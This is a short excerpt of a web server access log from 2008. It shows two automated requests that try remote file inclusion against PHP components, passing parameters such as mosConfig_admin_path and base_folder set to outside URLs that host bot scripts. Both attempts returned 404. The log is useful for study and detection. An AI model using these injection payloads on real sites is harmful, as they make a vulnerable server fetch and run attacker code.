87.106.77.242 - - [22/Aug/2008:03:32:57 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://wtv.mathiaskarge.de//marthabotid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
91.186.30.30 - - [22/Aug/2008:03:33:23 -0500] "GET /logs/access_log.1208044800//Neos_Chronos/header.php?base_folder=http://locoputo1234.100webspace.net/bots/ids.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.808"
